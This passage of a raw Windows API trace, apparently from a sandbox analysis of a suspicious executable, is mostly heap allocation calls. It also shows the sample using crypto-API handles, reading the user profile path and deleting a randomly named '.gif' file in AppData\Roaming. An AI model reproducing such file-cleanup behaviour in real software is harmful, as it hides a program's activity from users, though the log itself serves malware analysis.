dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0234.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0234.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0234.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0234.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0234.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0234.828] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0234.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0234.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0234.828] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0234.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0234.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0234.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0234.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0234.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0234.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0234.830] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0234.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0234.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0234.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.831] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0234.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0234.832] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0234.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0234.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0234.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0234.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.833] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0234.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0234.833] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0234.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0234.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.833] FreeLibrary (hLibModule=0x756e0000) returned 1 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0234.833] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0234.833] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0234.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0234.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0234.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0234.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0234.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0234.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0234.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0234.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0234.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0234.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0234.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0234.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0234.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0234.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0234.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.834] CloseHandle (hObject=0x2a0) returned 1 [0234.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0234.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0234.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0234.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0234.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0234.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0234.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0234.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0234.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0234.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0234.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0234.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0234.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0234.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0234.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0234.836] CloseHandle (hObject=0x2d0) returned 1 [0234.840] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0234.840] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0234.840] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0234.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0234.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0234.841] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/MWbKfh.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\MWbKfh.gif", lpFilePart=0x8cedf4*="MWbKfh.gif") returned 0x2a [0234.841] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\MWbKfh.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mwbkfh.gif")) returned 0x20 [0234.841] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\MWbKfh.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58df110, ftCreationTime.dwHighDateTime=0x1d5e230, ftLastAccessTime.dwLowDateTime=0xb26a8a90, ftLastAccessTime.dwHighDateTime=0x1d5e759, ftLastWriteTime.dwLowDateTime=0xb26a8a90, ftLastWriteTime.dwHighDateTime=0x1d5e759, nFileSizeHigh=0x0, nFileSizeLow=0x2641, dwReserved0=0x1, dwReserved1=0x1c, cFileName="MWbKfh.gif", cAlternateFileName="")) returned 0xa87050 [0234.841] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\MWbKfh.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mwbkfh.gif")) returned 1 [0234.883] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58df110, ftCreationTime.dwHighDateTime=0x1d5e230, ftLastAccessTime.dwLowDateTime=0xb26a8a90, ftLastAccessTime.dwHighDateTime=0x1d5e759, ftLastWriteTime.dwLowDateTime=0xb26a8a90, ftLastWriteTime.dwHighDateTime=0x1d5e759, nFileSizeHigh=0x0, nFileSizeLow=0x2641, dwReserved0=0x1, dwReserved1=0x1c, cFileName="MWbKfh.gif", cAlternateFileName="")) returned 0 [0234.883] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0234.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0234.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 